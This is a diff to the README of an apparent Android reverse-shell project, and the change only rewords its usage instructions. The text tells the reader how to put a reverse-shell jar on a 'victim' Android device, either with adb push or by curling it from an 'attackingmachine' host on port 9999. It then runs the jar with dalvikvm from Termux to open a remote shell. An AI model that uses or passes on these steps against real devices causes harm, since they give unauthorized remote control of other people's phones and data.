CalfCrusher/JavaAndroidReverseShell/README.md

 ## On Victim device - Android -
 `adb push reverse.jar /sdcard` (if Android Debug Tools is enabled)

-or you can just curl and then run the reverse shell using dalvikvm from Termux:
+or you can just curl

 `curl http://attackingmachine:9999/reverse.jar -o /sdcard/reverse.jar`<br/>

-then
+and then run the reverse shell using dalvikvm from Termux:

 `cd /system/bin/ && ./dalvikvm -cp /sdcard/reverse.jar AndroidReverseShell`